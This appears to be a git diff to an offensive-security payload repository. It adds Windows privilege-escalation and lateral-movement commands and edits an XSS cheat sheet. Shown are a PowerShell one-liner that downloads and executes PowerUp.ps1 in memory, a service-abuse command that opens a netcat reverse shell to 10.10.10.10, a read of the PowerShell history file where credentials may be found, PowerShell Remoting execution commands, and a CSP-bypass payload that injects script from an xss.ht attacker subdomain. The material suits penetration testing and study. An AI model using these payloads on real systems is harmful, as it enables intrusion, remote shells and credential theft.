diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 814adcb..8e18973 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -457,6 +457,7 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ### Powershell history ```powershell +type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt cat (Get-PSReadlineOption).HistorySavePath @@ -676,7 +677,24 @@ wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` -Metasploit provides the exploit : `exploit/windows/local/trusted_service_path` +* Metasploit exploit : `exploit/windows/local/trusted_service_path` +* PowerUp exploit + + ```powershell + # find the vulnerable application + C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks" + + ... + [*] Checking for unquoted service paths... + ServiceName : BBSvc + Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe + StartName : LocalSystem + AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path + ... + + # automatic exploit + Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe" + ``` ### Example diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index c674732..0fad3a4 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -11,6 +11,7 @@ * [Metasploit - Psexec](#metasploit-psexec) * [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials) * [WinRM](#winrm) +* [Powershell Remoting](#powershell-remoting) * [Crackmapexec](#crackmapexec) * [Winexe](#winexe) * [WMI](#wmi) @@ -147,6 +148,30 @@ conn.shell(:powershell) do |shell| end ``` + +## Powershell Remoting + +> PSSESSION + +```powershell +PS> Enable-PSRemoting + +# one-to-one interactive session +PS> Enter-PSSession -computerName DC01 +[DC01]: PS> + +# one-to-one execute scripts and commands +PS> $Session = New-PSSession -ComputerName CLIENT1 +PS> Invoke-Command -Session $Session -scriptBlock { $test = 1 } +PS> Invoke-Command -Session $Session -scriptBlock { $test } +1 + +# one-to-many execute scripts and commands +PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service } +PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1 +``` + + ## Winexe Integrated to Kali @@ -262,6 +287,7 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe" PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe ``` + ## References - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) diff --git a/README.md b/README.md index 478a9a5..adcb2fe 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,13 @@ A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I :heart: pull requests :) -You can also contribute with a :beers: IRL +You can also contribute with a :beers: IRL, or using the sponsor button. + + +

+ +

+ Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter: diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 566e054..f0b5536 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -972,7 +972,8 @@ window.frames[0].document.head.appendChild(script); ### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f) ```js -d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) +// CSP Bypass with Inline and Eval +d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) ``` ### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)